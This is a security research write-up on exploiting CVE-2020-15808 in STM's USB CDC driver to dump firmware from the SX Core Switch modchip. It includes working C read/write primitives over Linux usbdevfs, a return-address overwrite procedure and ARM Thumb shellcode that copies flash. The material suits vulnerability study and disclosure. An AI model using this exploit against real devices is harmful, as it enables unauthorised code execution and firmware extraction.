pixel-stuck/writeup.md

## writeup.md

      
    Raw
  

              writeup.md
            
          
    Hacking the SX Core modchip

Background

On October 2nd 2020, CVE-2020-15808 was publicly announced, detailing an out-of-bounds memory read/write vulnerability in STM's microcontroller firmware. Any chip containing STM's USB CDC driver library contains the bugged code, which represents a large amount of products on the market. While bugged STM libraries may be bad enough, this problem is much more widespread. Several companies manufacture "clones" of STM chips which, due to mostly identical MMIO (Memory Mapped Input/Output) addresses, fully support the affected STM vendor code. Most clone manufacturers don't offer their own libraries, so developers must either write their own from scratch, or they can use the STM's existing libraries, and most clone manufacturers encourage this.
Armed with this information, I became interested in exploiting and dumping the flash on the "Team Xecuter" SX Core modchip for the Nintendo Switch. The MCU used on the chip is the GD32F350CBT6, which exposes a serial console over USB using STM's library as a base. Used in combination with an FPGA, the chip makes use of voltage glitching to obtain code execution on the console.
USB Yak-shaving

My initial goals were:

Understanding what conditions the bug were triggered under
Learning how to replicate those conditions via the USB port on my PC

The answer to the first question is relatively simple, but requires understanding a bit about USB. USB has different kinds of data transfers, among which, is the "Control Transfer". The expected structure for requesting a control transfer can be seen here:


Offset
Field
Size
Data Type
Description


0
bmRequestType
1
Bit-Field
D7 - Data Direction
      0 - Host to Device
1 - Device to Host
D6:5 - Type
  00 - Standard
 01 - Class
  10 - Vendor
 11 - Reserved
D4:0 - Recipient
 00000 - Device
  00001 - Interface
 00010 - Endpoint
  00011 - Other
 Otherwise: Reserved


1
bRequest
1
Value
Request-specific


2
wValue
2
Value
Request-specific


4
wIndex
2
Index/Offset
Request-specific


6
wLength
2
Count
Number of bytes to be transferred


Taking a look at the vulnerable code, we should be able to figure out what exactly to send.
  switch (req->bmRequest & USB_REQ_TYPE_MASK)
  {
    /* CDC Class Requests -------------------------------*/
  case USB_REQ_TYPE_CLASS :
      /* Check if the request is a data setup packet */
      if (req->wLength)
      {
        /* Check if the request is Device-to-Host */
        if (req->bmRequest & 0x80)
        {
          /* Get the data to be sent to Host from interface layer */
          APP_FOPS.pIf_Ctrl(req->bRequest, CmdBuff, req->wLength);
          
          /* Send the data to the host */
          USBD_CtlSendData (pdev, 
                            CmdBuff,
                            req->wLength);          
        }
        else /* Host-to-Device requeset */
        {
          /* Set the value of the current command to be processed */
          cdcCmd = req->bRequest;
          cdcLen = req->wLength;
          
          /* Prepare the reception of the buffer over EP0
          Next step: the received data will be managed in usbd_cdc_EP0_TxSent() 
          function. */
          USBD_CtlPrepareRx (pdev,
                             CmdBuff,
                             req->wLength);          
        }
      }
      else /* No Data request */
      {
        /* Transfer the command to the interface layer */
        APP_FOPS.pIf_Ctrl(req->bRequest, NULL, 0);
      }
Reading through this code, the answer to question one becomes obvious: any time a valid USB control transfer with the type "class" is sent to the chip with a large wLength, an out of bounds read or write will be triggered.
It is a bit more nuanced, as different CDC implementations can use different values for bRequest, and this is part of what makes a particular request "valid" or not. Sending an incorrect bRequest value here, even with everything else correct, will get you nothing back from the USB device.
In order to answer the second question, I did some experimentation with the Linux Kernel's URBs or "USB Request Buffers". After some experimentation, I found I could trigger the out of bounds read with the following code:
  ...
  struct usbdevfs_ctrltransfer urb;
  memset(&urb, 0, sizeof (urb));
  uint8_t *buffer = malloc(0x1000);

  urb.bRequestType = USB_DIR_IN | USB_TYPE_CLASS | USB_RECIP_DEVICE;
  urb.bRequest = USB_CDC_REQ_GET_LINE_CODING;
  urb.wValue = 0;
  urb.wIndex = 0;
  urb.data = buffer;
  urb.wLength = 0x1000;
  urb.timeout = 5000; /* in milliseconds */
  
  int rc = ioctl(usb_fd, USBDEVFS_CONTROL, &urb);
  if (rc < 0) {
    perror(NULL);
    exit(-1);
  }
This allowed me to confirm the bug. However, the Linux kernel limits the size of data read with this method of sending the control request. In my case, I could only dump 0x1000 bytes. That said, it was a starting point, and I had some direction from the experimentation I'd done previously, and thanks to the work of @DavidBuchanan314. Using David's minimalist exploit implementation of a similar bug (CVE-2018-6242), I had a starting point for sending an unbounded control transfer. After adapting my working implementation over, I ended up with two functions; a read and write primitive.
int ctrl_transfer_unbounded_read(int fd, int length, char *buf_out)
{
    int buf_size = sizeof(struct usb_ctrlrequest) + length;
    uint8_t *buffer = calloc(1, buf_size);
    struct usbdevfs_urb *purb;
    
    struct usb_ctrlrequest *ctrl_req = (struct usb_ctrlrequest *) buffer;
    ctrl_req->bRequestType = USB_DIR_IN | USB_TYPE_CLASS | USB_RECIP_DEVICE;
    ctrl_req->bRequest = USB_CDC_REQ_GET_LINE_CODING;
    ctrl_req->wIndex = 0;
    ctrl_req->wLength = length;
    
    struct usbdevfs_urb urb = {
        .type = USBDEVFS_URB_TYPE_CONTROL,
        .endpoint = 0,
        .buffer = buffer,
        .buffer_length = buf_size,
        .usercontext = (void *) 0x1337,
    };
    
    if (ioctl(fd, USBDEVFS_SUBMITURB, &urb) < 0)
        return -1;
    
    if (ioctl(fd, USBDEVFS_REAPURB, &purb) < 0)
        return -2;

    memcpy(buf_out, buffer + sizeof(struct usb_ctrlrequest), length);
    free(buffer);

    return 0;
}

int ctrl_transfer_unbounded_write(int fd, int length, char *buf)
{
    int buf_size = sizeof(struct usb_ctrlrequest) + length;
    uint8_t *buffer = calloc(1, buf_size);
    struct usbdevfs_urb *purb;
    
    memcpy(buffer + sizeof(struct usb_ctrlrequest), buf, length);
            
    struct usb_ctrlrequest *ctrl_req = (struct usb_ctrlrequest *) buffer;
    ctrl_req->bRequestType = USB_DIR_OUT | USB_TYPE_CLASS | USB_RECIP_INTERFACE;
    ctrl_req->bRequest = USB_CDC_REQ_SET_LINE_CODING;
    ctrl_req->wIndex = 0;
    ctrl_req->wLength = length;

    struct usbdevfs_urb urb = {
        .type = USBDEVFS_URB_TYPE_CONTROL,
        .endpoint = 0,
        .buffer = buffer,
        .buffer_length = buf_size,
        .usercontext = (void *) 0x1337,
    };

    if (ioctl(fd, USBDEVFS_SUBMITURB, &urb) < 0)
        return -1;
    
    if (ioctl(fd, USBDEVFS_REAPURB, &purb) < 0)
        return -2;
        
    free(buffer);

    return 0;
}
Gaining arbitrary code execution

After implementing my read/write primitives, along with some more logic to easily specify an operation (read/write) and a destination/source file, the experimentation began. In the past, I was able to get an SRAM dump after the CDC driver had run, via the SWD debug port. Debug on the chip was not enough to dump the internal flash of the device, as flash reads/writes were disabled, so this bug needed to be leveraged. Having this past RAM dump allowed me to find where the buffer was located within the 16 KiB SRAM. Through experimentation, and examination of the data, it was determined that the stack pointer was initially set to 0x20002000; the boundary between the upper and lower half of SRAM. Our buffer started at 0x20000244, and this gave the perfect target for some shellcode and a stack smash. Sending anything over 0x1d08 bytes to the chip via our write primitive would crash the chip. When the SRAM was read in the location where writing caused a crash to occur, a return address was present. Reading 0x1d0c bytes from the chip, then immediately sending it back, however, did not cause a crash, and the chip retained full USB functionality. After some more experimentation, I came up with the following exploit procedure:

Perform a read of 0x1d0c bytes from the chip
Insert some shellcode at the beginning of what we just read
Modify the return address to point to the shellcode
Write the now-modified ram dump back to the chip

This leads to aribtrary code execution on the chip. However, we still don't have a way to read the results. The chip is now running our code, and not the USB CDC driver code. With some carefully crafted shellcode, maybe we can come up with a solution.
The shellcode

Our goal was the read out the flash on the chip, so first we need to know the location of the flash. Thankfully, the datasheet for this MCU has the memory layout; flash is at address 0x08000000. Our particular model had 64 KiB for the "code area" and 64 KiB for the "data area". Our SRAM was only 16 KiB, so we couldn't dump it all in one go, and in order to retain functionality, we also had to make sure any important registers didn't get overwritten. For this reason, it was decided that 0x2000 bytes should be read at a time, into the unused upper half of the SRAM. Sixteen total iterations were needed to dump all of flash. Since I also wanted to return back to normal execution after I was done, I had to be sure not to clobber any registers that needed to be preserved; in order to achieve this, I used the "argument" registers (r0-r3), which are able to be clobbered just fine. I ended up with the following ARM assembly:
.thumb

start:
  ldr r0, =0x08000000 # start of flash. Modify this to read the location desired
  ldr r1, =0x20002000 # destination
  ldr r2, =0x2000     # size to read
wordcopy:
  ldr r3, [r0]        # read the word from source
  add r0, r0, #4      # increment source address
  str r3, [r1]        # store the word at destination
  add r1, r1, #4      # increment destination address
  sub r2, r2, #4      # decrement the size
  cmp r2, #0          # check if size left to copy is 0
  bne wordcopy        # if the size left to copy is not 0, loop, otherwise, continue to the next instruction.
  ldr r0, =0x080006B9 # load original return address into r0
  bx r0               # jump back to original return address

.pool

Conclusion

Vendor drivers may be a convenient starting point or solution, but proper auditing of code is strongly advised for any device you create, regardless of where the code originated. Due to this oversight, a seemingly simple bug has made vulnerable a massive amount of devices. The impact of our example case may be low, but as chips using this code are widespread in both consumer and industrial applications, the potential for a highly damaging scenario exists.
Furthermore, STM did not act as a responsible vendor when presented with the CVE. Eschewing a graceful response to the researcher, it instead provided no response at all. Due to this lack of reciprocation alongside a more than reasonable amount of time, the researcher opted to disclose the vulnerability publicly. A responsible vendor would have made efforts to communicate with the researcher in a timely manner. It would then attempt to mitigate the situation by promptly notifying companies with affected products, ensuring sufficient time to patch the vulnerability to prevent or mitigate damage.
Offset	Field	Size	Data Type	Description
0	bmRequestType	1	Bit-Field	D7 - Data Direction 0 - Host to Device 1 - Device to Host D6:5 - Type 00 - Standard 01 - Class 10 - Vendor 11 - Reserved D4:0 - Recipient 00000 - Device 00001 - Interface 00010 - Endpoint 00011 - Other Otherwise: Reserved
1	bRequest	1	Value	Request-specific
2	wValue	2	Value	Request-specific
4	wIndex	2	Index/Offset	Request-specific
6	wLength	2	Count	Number of bytes to be transferred